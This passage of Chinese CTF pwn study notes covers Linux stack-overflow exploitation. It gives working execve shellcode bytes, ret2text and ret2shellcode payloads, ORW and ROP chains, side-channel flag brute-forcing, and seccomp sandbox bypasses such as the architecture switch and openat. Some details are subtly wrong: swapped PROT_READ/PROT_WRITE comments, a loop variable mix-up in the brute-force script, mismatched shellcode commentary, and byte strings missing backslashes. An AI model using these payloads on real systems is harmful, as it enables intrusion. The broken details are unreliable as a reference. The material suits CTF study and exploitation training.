时使用replace(b'\x00', b'')
或p64(0x123456781234)[:6]
替换防止提前0截断
1
|
((void (__fastcall *)(char *))*(&funcs_list + 3 * idx))(arg_list);
|
栈溢出漏洞
栈基础
函数调用栈在内存中从高地址向低地址生长,所以栈顶对应内存地址压栈时变小,退栈时变大
- 紧邻 ebp 的【stack frame pointer】保存父进程/函数的 ebp 地址
- 子函数的参数保存在父函数栈帧末尾,返回地址前的 arguments 中
函数调用栈
ebp
:存储当前函数状态的基地址
esp
:存储函数调用栈的栈顶地址
eip
:存储即将执行的程序指令的地址
-
32位栈的三层嵌套调用演示:main -> func1 -> func2
-
arg1,2,3是func1函数的参数,但在main函数栈帧中
-
当局部变量是数组v[2]
时,索引低的v[0]
靠近rsp,地址更低,索引高的v[1]
靠近rbp,地址更高
函数开头及结尾
1
2
3
4
5
6
7
|
push ebp
mov ebp, esp
leave
#等价于 mov esp, ebp 有局部变量的情况
# pop ebp
retn
#等价于 pop eip,实际没有该指令
|
压栈
- 被调用函数参数逆序压入栈内,esp→(arg1, arg2,…,argn)
- 将调用函数进行调用之后的下一条指令地址作为返回地址压入栈内,即调用函数的 eip 信息得以保存
- (call xxx)
- 将当前的ebp的值(调用函数的基地址)压入栈内,将ebp寄存器值更新为当前栈顶的地址,即ebp更新为被调用函数的基地址
- 被调用函数的局部变量压入栈内,只 esp 动
出栈
- 被调用函数局部变量栈内弹出,栈顶esp指向被调用函数的基地址ebp
- 基地址内存储的调用函数的基地址从栈内弹出到ebp寄存器中,调用函数的ebp得以恢复,栈顶esp指向返回地址
传参
-
系统调用syscall参数传递
- x86_32:参数小于等于6个,ebx,ecx,edx,esi,edi,ebp中;大于6个,全部参数放在一块连续内存区域,ebx保存指向该区域的指针,eax存系统调用号
- x86_64:参数小于等于6个,rdi,rsi,rdx,r10,r8,r9;大于6个,全部参数放在一块连续内存区域,rbx保存指向该区域的指针
- 使用
syscall
,rax放每个system call函数对应的索引
-
函数function参数传递
- x86_32/x86:从右至左顺序压参数入栈,栈传递参数,eax存放返回值
- x86_64/amd64:参数少于7个时,从左到右:rdi,rsi,rdx,rcx,r8,r9中,大于7个,后面的从“右向左”放入栈中
地址泄露
read漏洞点
无canary时,下述代码泄露栈地址,构造payload=b'a'*0x30
,接收48个a后会泄露出后续栈地址内容
1
2
3
|
char buf[48]; // [rsp+0h] [rbp-30h] BYREF
read(0, buf, 0x40uLL); // 末尾不为0则打印出后续内容
printf("%s", buf);
|
无截断泄露
1
2
3
4
5
|
len = read(0, input, size);
if( *(input+len-1) == '\n') // 最后一个值不传入\n
*(input+len-1)=0;
command_name = strtok(input, " ");
printf("%s", command_name); // 结尾无\0截断可泄露后续栈地址或进程基址或libc[_IO_2_1_stderr_]地址
|
栈溢出逻辑漏洞点
1
|
for(int i=0; i <= len; i++) // 循环i+1次
|
循环完后,使用循环变量造成越界
1
2
3
4
|
for(i=0; i < sizeof(buf); i++) {
...
}
buf[i] = 0; // off by null
|
ret2text
- 退栈过程,返回地址会传给eip,让溢出数据用攻击指令的地址覆盖返回地址
- 攻击指令的地址一般为用户中存在的后门函数地址,即已存在
- (考虑最简单情况canary并未保护,则stack frame pointer和局部变量之间没有canary的随机值)
漏洞点
1
2
|
char buffer[8]; // [esp+8h] [ebp-10h] 距离ebp 16字节, 距离esp 8字节 => 8字节缓冲区
gets(buffer);
|
32位
1
2
3
4
5
6
|
# 覆盖返回地址
payload = b'a'*padding + p32(execve_plt_addr) + p32(ret_addr) + p32(arg1) + p32(arg2) + p32(arg3)
# arg1:/bin/sh_addr
# arg2:argv[] = 0
# arg3:envp[] = 0
# ret_addr可随意填写, 指代execve函数执行后的返回地址
|
有后门函数:覆盖完缓冲区padding字节,覆盖ebp的值4字节,最后覆盖返回地址
1
2
|
payload = b'A' * padding + b'BBBB' + p32(backdoor_addr)
# 后门函数使用elf.symbols['函数名']
|
64位
可能会遇到RSP 16
字节对齐问题,可以使用两种方法来达成目的:
- 将后门函数地址+1来跳过
push rbp
调整rsp栈帧,前提是后门函数第一个指令为push rbp
,指令长度1字节
- 在后门函数地址前加入
ret
指令地址调整rsp栈帧
ret2shellcode
无后门函数且栈可执行时,使用ret2shellcode
shellcode汇编
1
2
3
4
5
6
7
8
|
.intel_syntax noprefix
.text
.globl _start
.type _start, @function
_start:
xxx
xxx
|
生成shellcode
1
2
|
gcc -c start.s -o start.o
ld -e _start -z noexecstack start.o -o start
|
可以在 shellcode数据库 寻找适合的shellcode
1
|
xchg edi, eax ; 交换两个寄存器值, 比 mov 机器码短
|
32位
21字节shellcode:
1
2
3
4
5
6
7
8
9
10
|
shellcode = asm("""
push 0x68732f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
push 11
pop eax
int 0x80
""")
|
无\x00
截断,21字节
1
|
x6ax0bx58x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9xcdx80
|
41字节scanf可读取
1
|
xebx1bx5ex89xf3x89xf7x83xc7x07x29xc0xaax89xf9x89xf0xabx89xfax29xc0xabxb0x08x04x03xcdx80xe8xe0xffxffxff/bin/sh
|
64位
22字节shellcode:
1
2
3
4
5
6
7
8
9
10
11
|
shellcode = asm("""
mov rbx, 0x68732f6e69622f
push rbx
push rsp
pop rdi
xor esi,esi
xor edx,edx
push 0x3b
pop rax
syscall
""")
|
23字节shellcode:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
xor esi, esi ; 将寄存器 esi 清零 \x31\xf6
mov rbx, 0x68732f2f6e69622f ; 将字符串 "/bin//sh" 存入寄存器 rbx
push 0x54 ; 将字符串 "/bin//sh" 压入栈中
push 0x53 ; \x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68
push rbx ; 将字符串 "/bin//sh" 压入栈中 \x56\x53\x54
pop rdi ; 将栈顶元素弹出并存入寄存器 rdi \x5f
push 0x3b ; 将系统调用号(sys_execve)压入栈中 \x6a\x3b
pop rax ; 将栈顶元素弹出并存入寄存器 rax \x58
xor edx, edx ; 将寄存器 edx 清零 \x31\xd2
syscall ; 执行系统调用 \x0f\x05
|
无\x00
截断且scanf可读,22字节
1
|
x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fxb0x3bx99x0fx05
|
栈上shellcode
漏洞点
1
2
3
|
char buf; // [esp+0h] [ebp-88h]
read(0, &buf, 0x100u);
((void)buf)(arg1); // 执行shellcode
|
先将shellcode写入栈缓冲区,然后篡改返回地址为手动传入的shellcode所在缓冲区地址
1
2
3
|
payload = shellcode + b'\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr) # 填充
# buf_addr即shellcode地址
# \x90: Nop
|
-
由于the NX bits
保护措施,栈缓冲区不可执行
-
改为向bss缓冲区(默认可执行)或向堆缓冲区写入shellcode并使用mprotect赋予其可执行权限
-
修改某地址为可执行后可以通过rop构造call rax/rdi中存储的该地址来执行
-
1
|
payload = p64(pop_rax_ret_addr) + p64(rw_memory) + p64(call_rax_addr)
|
1
2
|
mprotect(&GLOBAL_OFFSET_TABLE_, size, 7);
// 将全局偏移表所在的size大小的内存区域的权限设置为可读、可写和可执行
|
mprotect:修改一段指定内存区域的保护属性,绕过NX
1
2
3
4
5
|
#include <unistd.h>
#include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot); // start开始长度len的内存区保护属性改为prot指定值
// 可用“|”将几个属性合起来使用, 指定内存区间必须包含整个内存页(4K) 成功返回0, 失败返回-1
// PROT_READ:内容可写; PROT_WRITE:内容可读; PROT_EXEC:可执行; PROT_NONE:内容不可访问
|
payload构造时
1
2
|
# start位置通过下列操作对齐
buf_addr & ~0xFFF
|
bss段上shellcode
1
2
3
4
5
|
char s; // [esp+1Ch] [ebp-64h]
gets(&s);
strncpy(buf2, &s, 0x64u); //buf2为未初始化的全局变量,在bss中
//复制字符串,从s指向的地址复制0x64u的字符数到buf2中
|
return address 0x4 |
|
previous ebp 0x4 |
ebp |
s 0x64 |
|
|
esp |
- 而IDA有的时候不可靠,需要依靠gdb动态调试判断真实的buf与ebp之间的距离
- 构造的payload使用gets函数覆盖s,ebp和返回地址,返回地址覆盖为shellcode地址,shellcode由strncpy函数从s中复制到bss段中的buf2中;于是返回地址覆盖为buf2中shellcode地址。
- 输入同样的exp后执行失败,由于高版本linux中程序bss段不再默认可执行导致出错,查看方法:
- gdb中vmmap找到对应的bss段,buf2地址为0x804a080,不可执行
由于服务器一定开启了ASLR,所以返回地址并不一定得覆盖为shellcode地址,因为不能确定所以需要使用【Nop滑梯】
shellcode技巧
① 当前方执行完read函数就执行shellcode,且此时输入极少
1
2
3
4
5
6
7
8
|
read(0, (void *)0x20240000, 0xDuLL);
mov edx, 0Dh ; nbytes
mov esi, 20240000h ; buf
mov edi, 0 ; fd
call _read
MEMORY[0xdead]();
... // esi和edi未被改变
call rdx
|
可以输入以下绕过:
1
2
3
4
|
bypass = asm("""
mov rdx, 0x1000
syscall ; 再次read系统调用再送入一次shellcode执行
""")
|
② 可见字符Shellcode
1
|
if ( buf[i] <= 31 || buf[i] == 127 ) // 仅允许输入可见字符的Shellcode
|
使用工具AE64
1
2
3
4
5
6
7
8
9
10
11
|
from ae64 import AE64
s = shellcraft # 使用ORW
shellcode = s.open('./flag')
shellcode += s.read(3,0x20240000,30)
shellcode += s.write(1,0x20240000,30)
ss = AE64().encode(asm(shellcode),'rdx',0,'fast')
# arg: shellcode, 寄存器: call rdx, 偏移, 策略:fast or small
print(ss)
|
1
2
3
4
5
6
|
// 测试
int main(){
char shellcode[]="visible_shellcode";
void(*run)()=(void(*)())shellcode; //run函数指针,无参无返回值; 将shellcode转换为函数指针
run();
}
|
③ 侧信道攻击
- 传入极少字节shellcode,已知rdi寄存器存放泄露内容flag或已通过open与read读到rdi或rsp中
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
flag = b''
i = 0
j = string.printable
while True:
for k in j:
try:
io = process("./elf")
payload = f"""
xor byte ptr [rdi+{i}], {j}
jz $
"""
shellcode = asm(payload) # 6字节
io.send(shellcode)
io.recv(timeout=1) # 若猜测正确程序卡死
print(f"idx: {i}, try: {j}--yes")
flag+=str(chr(j))
print(flag)
io.close()
break
except EOFError:
io.close() # 猜测错误则EOF跳出
continue
|
seccompt设置关闭了输出流,或白名单形式禁用了输出系统调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
def check(i, c):
shellcode = asm("""
mov dl, [rsp + {}] # 字节爆破, flag已读到rsp中,即栈顶
cmp dl, {}
jbe $ # 小于等于跳转
""".format(i, c))
p.send(shellcode)
try:
p.recv(timeout=1) # 未结束无输出超时不触发异常
p.kill()
return True
except KeyboardInterrupt:
exit(0)
except:
p.close() # 若进程已结束触发异常
return False
i = 0
flag = ''
while True:
l = 0x20
r = 0x7f
while l < r:
m = (l + r) // 2 # 二分查找
if check(i, m): # flag <= m
r = m
else: # m <= flag
l = m + 1
flag += chr(l)
log.info(flag)
i += 1
|
④ 编译绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# 禁用: [A-Za-z],"#","*","[","]","/","="; "{"和"}"数量各为1
# 可包含: "_() {"
src_path = "test.c"
with open(src_path, "w") as file:
file.write(input_code)
# kali中成功编译
returncode = subprocess.call(["gcc", "-B/usr/bin", "-Wl,--entry=_" ,"-nostartfiles", "-w", "-O0", "-o", "test", src_path], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
# -B/usr/bin 查找可执行文件、库和头文件的路径
# -Wl,--entry=_ 传递给链接器, 入口从_开始
# -nostartfiles 不运行标准初始化操作, 用于编写内核或固件等系统软件
# -w不显示警告信息 -O0不进行任何优化
compiled_path = os.path.join(os.getcwd(), "test")
subprocess.run([compiled_path])
|
实际调试发现gcc -nostartfiles -o test source.c
即可达成效果,构造payload
1
2
|
_() {(&_ + 41)(1852400175,0,0,6845231);_(19701566652744);_(81265623368);_(81258304599);_(5561986562150);}
// &_: 函数的地址
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
_() {
// <_> push rbp
// <_+1> mov rbp, rsp
(&_ + 41)(1852400175,0,0,6845231); // 将/bin/sh分别装入rdi和rcx
// <_+4> lea r8, [rip + 1eh] 0x1e+11=41
// <_+11> mov ecx, 68732fh ;"/sh"
// <_+16> mov edx, 0
// <_+21> mov esi, 0
// <_+26> mov edi, 6e69622fh;"/bin"
// <_+31> mov eax, 0
// <_+36> call r8
_(19701566652744); // 0x11eb20e1c148
// <_+41> shl rcx, 20h rcx:0x68732f00000000 48 c1 e1 20
// <_+45> jmp $+19; _+64 eb 11
_(81265623368); // 0x12ebcf0148
// <_+64> add rdi, rcx rdi:0x68732f6e69622f '/bin/sh' 48 01 cf
// <_+67> jmp $+20; _+87 eb 12
_(81258304599); // 0x12eb5f5457
// <_+87> push rdi 将/bin/sh推入栈顶 57
// <_+88> push rsp 将栈顶地址(/bin/sh地址)推入栈顶 54
// <_+89> pop rdi rdi存/bin/sh地址 5f
// <_+90> jmp $+20; _+110 eb 12
_(5561986562150); // 0x50f003bb866
// <_+110> mov ax, 3bh 66 b8 3b 00
// <_+114> syscall 0f 05
}
|
orw bypass
Open syscall shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
# open调用 21字节 ret会进入0x67616c66出错
context(arch="amd64")
shellcode = asm("""
mov rdi, 0x67616c66 /* 'flag'*/
push rdi
mov rdi, rsp
xor esi, esi /* O_RDONLY = 0 */
mov eax, 0x2
syscall
ret
""")
# open调用 21字节 ret 会返回源程序
shellcode2 = asm("""
lea rdi, [rip+flag]
xor esi, esi /* O_RDONLY = 0 */
mov eax, 0x2 /* open syscall */
syscall
ret /* 为了返回源程序 */
flag: .ascii "flag"
""") # 使用该情况要注意shellcode前后影响因素,flag后加入b'\x00'及前方加入b'\x90'(nop)
|
ORW
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
addr = 0xdead
flag_addr = addr + 0x100 # flag硬写入内存中
shellcode = f"""
mov rax, 2
mov rdi, {flag_addr}
mov rsi, 0
syscall
xor rax, rax
mov rdi, 3
mov rsi, {flag_addr}
mov rdx, 0x40
syscall
mov rax, 1
mov rdi, 1
syscall
"""
pay = b'\x90'*0x10 + asm(shellcode) # 第二次读需要重新覆盖前面0x10地址
payload = pay.ljust(0x100, b'\x90') + b'/flag\x00\x00\x00'
# 可能需要gdb微调在前后加\x00或\x90使刚好对应地址读取flag而不是flagxx
|
通过ROP使用orw读flag操作
1
2
3
4
5
|
read(0,free_hook,4) //需要输入flag,替代free_hook地址
//栈:pop_rdi_ret 0 pop_rsi_ret free_hook_addr pop_rdx_ret 4 read_addr
open(free_hook,0) //打开flag
read(3,free_hook,100) //读flag
puts(free_hook) //输出flag
|
读flag到某个地方
libc.['environ']
,是libc
存储的栈地址
libc
的bss
段,将libc
放入IDA
中查看即可
__free_hook
,__free_hook
是全局变量,可直接被修改
其余绕过
① 禁用 SYS_open ,用 SYS_openat 代替
1
2
3
4
5
6
|
/*
# define __NR_openat 257 rax
# define AT_FDCWD -100 rdi
# define O_RDONLY 00 rdx
*/
int fd = syscall(__NR_openat, AT_FDCWD, "flag", O_RDONLY);
|
libc中的open函数底层实现调用的是openat系统调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
/* Open FILE with access OFLAG. If O_CREAT or O_TMPFILE is in OFLAG,
a third argument is the file protection. */
int __libc_open64(const char *file, int oflag, ...) {
int mode = 0;
if (__OPEN_NEEDS_MODE(oflag)) {
va_list arg;
va_start(arg, oflag);
mode = va_arg(arg, int);
va_end(arg);
}
return SYSCALL_CANCEL(openat, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, mode);
}
|
② strlen
获取shellcode长度,可采取\x00
开头的指令截断绕过长度判断
-
1
2
3
4
5
6
7
|
00 40 00 add BYTE PTR [rax+0x0], al
00 41 00 add BYTE PTR [rcx+0x0], al
00 42 00 add BYTE PTR [rdx+0x0], al
00 43 00 add BYTE PTR [rbx+0x0], al
00 45 00 add BYTE PTR [rbp+0x0], al
00 46 00 add BYTE PTR [rsi+0x0], al
00 47 00 add BYTE PTR [rdi+0x0], al
|
③ 4字节系统调用号绕过
当所有可利用系统调用号被禁了,但由于无判断sys_number >= 0x40000000
的情况,因此可以通过0x40000000|sys_number
来绕过,sys_number
为64位的系统调用号
④ 沙箱缺少对架构的判断
- 白名单只允许
read, write, brk, mprotect, fstat
函数,64位下fstat
调用号与32位下open
调用号相同
- 可以切换到32位下调用
open
系统通过调用,x86架构的CPU根据CS段寄存器对应的段描述符中的属性确定访问指令是32还是64位
- 32位CS为0x23,64位CS为0x33
- rdi寄存器需要指向shellcode地址,shellcode地址需要小于0x100000000,rsp 需要小于 0x100000000
- 下为shellcode内容:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
# 切换到32位
payload1 = '''
mov rsp, 0x404000+0x500 # 地址位于中间, 不超过4字节
mov r8, 0x23
shl r8, 0x20 # 0x23进入高32位下
mov rax, rdi # 赋给rax shellcode地址
add rax, 0x1e # payload1的长度, rax指向payload2起始地址
or rax, r8 # rax高32位为0x23,低32位为payload2起始地址
push rax
retf # 读取栈上前8字节,低4字节作为跳转地址,高4字节作为新的CS
'''
shellcode += asm(payload1, arch='amd64', bits=64)
info("shellcode1: " + hex(len(asm(payload1, arch='amd64', bits=64)))) # 0x1e
payload2 = '''
mov edx, eax # payload2起始地址
push 0x1010101
xor dword ptr [esp], 0x1016660 # 得到0x6761:ga
push 0x6c662f2e # lf/.
# ./flag
mov ebx, esp # ./flag 字符串地址
xor ecx, ecx
mov eax, 5
int 0x80 # open('./flag', 0)
push 0x33
add edx, 0x25 # payload2长度
push edx # 高32位为0x33,低32位为payload3起始地址
retf
'''
shellcode += asm(payload2, arch='i386', bits=32)
info("shellcode2: " + hex(len(asm(payload2, arch='i386', bits=32))))
payload3 = '''
mov rdi,rax # 3
mov rsi,rsp # rsp为flag字符串地址
mov edx,0x100
xor eax,eax
syscall # read(3, addr, 0x100)
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall # write(1, addr, 0x100)
'''
shellcode += asm(payload3, arch='amd64', bits=64)
|
⑤ close 绕过 fd 参数检查
1
2
3
4
5
|
rop += p64(elf.search(asm('pop rax; ret;'), executable=True).__next__())
rop += p64(3)
rop += p64(elf.search(asm('pop rdi; ret;'), executable=True).__next__())
rop += p64(0)
rop += p64(elf.search(asm('syscall; ret;'), executable=True).__next__()) # close
|
64位
ORW_ROP,栈迁移到写入rop的地址
1
2
3
4
|
payload += p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(libc.sym['open'])
payload += p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(libc.sym['read'])
payload += p64(pop_rdi)+p64(flag_addr)+p64(libc.sym['puts'])
#payload += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(libc.sym['write'])
|
32位
外平栈:函数开头push了函数参数参数导致栈发生改变,函数外通过pop arg; pop arg; ret
或add esp, xxh
等指令平衡栈——Linux
内平栈:函数内结尾通过pop arg; pop arg; ret
或add esp, xxh
等指令平衡栈
1
2
3
4
5
6
7
8
9
10
11
12
|
# 利用rop row
rop += p32(libc.sym['open'])
rop += p32(libc.search(asm('pop ebx; pop esi; ret;'), executable=True).__next__()) # 平衡栈
rop += p32(flag_addr) # open arg1
rop += p32(0) # open arg2
rop += p32(libc.sym['read'])
rop += p32(libc.sym['puts'])
rop += p32(3) # read arg1
rop += p32(buf_addr) # read arg2 and puts arg1
rop += p32(0x100) # read arg3
rop += rop.ljust(0x100, b'\x00')
rop += b"./flag\x00"
|
沙箱绕过
Seccomp
Sandbox,限制execve导致不能使用onegadget和system调用,一般两种方式开启沙箱
PR_SET_SECCOMP
是linux内核提供的一种机制,限制进程可执行的系统调用,可通过prctl()
系统调用设置(可以通过PR_SET_SECCOMP
设置进程的seccomp过滤器或PR_SET_NO_NEW_PRIVS
设置进程的no_new_privs
标志
- seccomp过滤器通过BPF(Berkeley Packet Filter)程序实现,可以过滤进程所发起的系统调用并限制;seccomp过滤器只在进程启动时设置,一旦设置不可修改
PR_SET_NO_NEW_PRIVS
标志可禁止进程获取更高权限,防止进程提权
编写沙箱规则保存在rule
文件中
1
2
3
4
5
6
7
8
9
|
A = arch
A == ARCH_X86_64 ? next : kill
A = sys_number
A >= 0x40000000 ? kill : next
A == execve ? kill : allow
allow:
return ALLOW
kill:
return KILL
|
通过seccomp-tools
将规则转换为可被PR_SET_SECCOMP
识别的规则
1
2
3
4
5
6
7
8
9
10
11
|
$ seccomp-tools asm rule -a amd64 -f raw | hexdump
$ seccomp-tools asm rule -a amd64 -f raw | seccomp-tools disasm -
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x04 0xc000003e if (A != ARCH_X86_64) goto 0006
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x02 0x00 0x40000000 if (A >= 0x40000000) goto 0006
0004: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0006: 0x06 0x00 0x00 0x00000000 return KILL
|
将规则应用于C程序中
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
#include <stdio.h>
#include <unistd.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <linux/filter.h>
int main() {
// 定义过滤器规则 存放机器码
struct sock_filter filter[] = {
{0x20, 0x00, 0x00, 0x00000004},
{0x15, 0x00, 0x04, 0xc000003e},
{0x20, 0x00, 0x00, 0x00000000},
{0x35, 0x02, 0x00, 0x40000000},
{0x15, 0x01, 0x00, 0x0000003b},
{0x06, 0x00, 0x00, 0x7fff0000},
{0x06, 0x00, 0x00, 0x00000000}
};
struct sock_fprog prog = {
.len = (unsigned short) (sizeof(filter) / sizeof(filter[0])), // 过滤器长度
.filter = filter,
};
// 确保进程无法获取新的权限
prctl(PR_SET_NO_NEW_PRIVS, SECCOMP_MODE_STRICT, 0LL, 0LL, 0LL);
// 设置seccomp过滤器
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == -1) {
perror("[-] prctl error.");
return 1;
}
// 执行系统调用 将会失败
char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);
return 0;
}
|
prctl——系统调用,控制和修改进程的行为和属性,决定系统调用
1
2
|
#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);
|
IDA显示
1
2
3
4
5
6
7
|
prctl(38, 1LL, 0LL, 0LL, 0LL);
// arg1: #define PR_SET_NO_NEW_PRIVS 38
// arg2: no_new_privs=1 无法使用execve() 继承到子进程
prctl(22, 2LL, &v);
// arg1: #define PR_SET_SECCOMP 22
// arg2: #define SECCOMP_MODE_FILTER 2 BPF过滤:对syscall的限制通过arg3的Berkeley Packet Filter相关结构体定义
|
使用Seccomp创建Seccomp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
// gcc test.c -o test -lseccomp
#include <unistd.h>
#include <seccomp.h>
int main() {
// 创建过滤器上下文
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_ALLOW); // 默认allow
// 添加过滤规则
seccomp_arch_add(ctx, SCMP_ARCH_X86_64);
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
seccomp_load(ctx);
// 执行系统调用
char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);
return 0;
}
|
seccomp_arch_add
函数
1
2
3
4
5
6
|
int seccomp_rule_add(scmp_filter_ctx ctx, uint32_t action, int syscall, unsigned int arg_cnt, ...);
// ctx: 过滤器上下文,存储过滤规则
// action: 规则匹配时的操作:SCMP_ACT_ALLOW允许系统调用, SCMP_ACT_KILL杀死进程, SCMP_ACT_ERRNO返回错误码并允许系统调用
// syscall: 限制的系统调用号
// arg_cnt: 要匹配的参数数量
// ...: 指定要匹配的参数值, 每个参数一个scmp_arg_cmp结构体, 包含参数比较方法和比较值
|
scmp_arg_cmp
结构体
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
struct scmp_arg_cmp {
unsigned int arg; /**< argument number, starting at 0 要比较的参数序号*/
enum scmp_compare op; /**< the comparison op 比较方式 */
/**
SCMP_CMP_NE: 不等于
SCMP_CMP_EQ: 等于
SCMP_CMP_LT: 小于
SCMP_CMP_LE: 小于等于
SCMP_CMP_GT: 大于
SCMP_CMP_GE: 大于等于
SCMP_CMP_MASKED_EQ: 按位与后等于
**/
scmp_datum_t datum_a; // 用来于参数比较的值
scmp_datum_t datum_b;
};
|
如:
1
2
3
4
5
6
7
|
// 规定 read 必须从标准输入读取不超过 BUF_SIZE 的内容到 buf 中
#define BUF_SIZE 0x100
char buf[BUF_SIZE];
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 3,
SCMP_A0(SCMP_CMP_EQ, fileno(stdin)),
SCMP_A1(SCMP_CMP_EQ, (scmp_datum_t) buf),
SCMP_A2(SCMP_CMP_LE, BUF_SIZE));
|
seccomp
1
2
3
4
|
// IDA 中显示
v = seccomp_init(111LL); // 初始化,参数表示用于过滤的操作模式
seccomp_rule_add(v, 0LL, 59LL, 0LL); // 禁用59系统调用号execve
seccomp_load(v); // 加载过滤器
|
绕过:查看ret2syscall中orw bypass
/proc泄露
- 保护全开,提供
open
,read
,write
,lseek
函数
1
2
3
4
|
open:
O_RDONLY 00000000
O_WRONLY 00000001
O_RDWR 00000002
|
1
2
3
|
off_t lseek(int fd, off_t offset, int whence);// 返回文件指针偏移值 或 -1
// fd: 文件描述符 offset: 相对于whence的偏移量
// whence: 文件指针基准位置【SEEK_SET 0 开头, SEEK_CUR 1 当前, SEEK_END 2 结尾】
|
/proc 文件系统
- Linux内核提供的一种伪文件系统,运行时可访问、设置内核内部数据结构,只存在内存中,不占外存空间
/proc/self/maps
: 得到当前进程内存映射关系,等价于pwndbg中的vmmap
,open只可读,可获取内存代码段基址
1
2
3
4
|
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555554000 0x555555555000 r--p 1000 0 /home/zhou/pwn
// 0x555555554000 即为文件基址
|
/proc/self/mem
: 进程内存内容,open可读可写,修改该文件等效于直接修改当前进程内存
绕过利用
1
2
3
4
5
6
7
|
// open时文件包含flag将会报错
if ( strstr(filename, "flag") ){ // filename中查找第一次出现"flag"的位置
exit(0);
}
// IDA
.rodata:000000000000216C needle db 'flag',0 ; DATA XREF: Open+4D↑o
|
Ptrace进程
__WAIT_STATUS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
// 定义了__WAIT_STATUS [union: 共用同一块内存,兼容系统]
typedef union {
// 都用于表示进程状态
union wait *__uptr; // 早期系统 指向 union wait 类型的指针
int *__iptr; // 现代系统 指向 int 类型的指针
} __WAIT_STATUS __attribute__ ((__transparent_union__));
// IDA
__WAIT_STATUS stat_loc; // 存储进程状态的变量 用于判断进程是否在系统调用的标志
HIDWORD(stat_loc.__iptr) = 0; // iptr指针指向的地址(64位)的高32位置为0 对应源码 int in_syscall = 0
wait((__WAIT_STATUS)&stat_loc); // 父进程等待子进程系统调用, 状态存储在stat_loc
if ( ((__int64)stat_loc.__uptr & 0xB00) == 0xB00 ) // __uptr 对应源码的 int status
// Linux 进程状态码 以宏解读: -> 判断是否遇到段错误
// 0x100:子进程被跟踪 (ptraced)
// 0x200:子进程遇到一个致命信号(如段错误)
// 0x800:子进程在执行系统调用时发生错误
LOBYTE(stat_loc.__uptr) != 127 // LOBYTE获取低8位, 127为 wait(pid) pid标识的命令未知的退出状态值
|
fork
1
2
3
|
v = fork(); // 子进程中返回0,父进程中返回子进程的PID
v & 0x80000000 != 0 // 判断 v 有符号数的最高位是否为1,为1则为负数,为0则为正数,判断v是否为负数
if(!v) {} // 进入子进程
|
ptrace:断点调试和系统调用跟踪
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
// 一个进程可观察和控制另一个进程的执行
ptrace(enum __ptrace_request op, pid_t pid,void *addr, void *data);
v1 = ptrace(PTRACE_TRACEME, 0LL, 0LL, 0LL); // 指示该进程由父进程跟踪, 后续参数忽略
v1 = ptrace(PTRACE_ATTACH, pid, 0LL, 0LL); // 跟踪调试指定pid进程, 此时子进程等待, 父进程可使用ptrace调试
ptrace(PTRACE_SYSCALL, v, 0LL, 0LL); // 重新启动停止的子进程 or 挂起子进程,直到子进程发出系统调用,父进程拦截处理
ptrace(PTRACE_KILL, a1, 0LL, 0LL); // 杀掉子进程
ptrace(PTRACE_GETREGS, pid, 0LL, vg); // 获取子进程寄存器状态, 内容存在vg中
// 源码
rax = regs.orig_rax; // IDA中源码将显示 v13 = v26等 需要判断
rdi=regs.rdi;
rsi=regs.rsi;
rdx=regs.rdx;
rcx=regs.rcx;
rip=regs.rip;
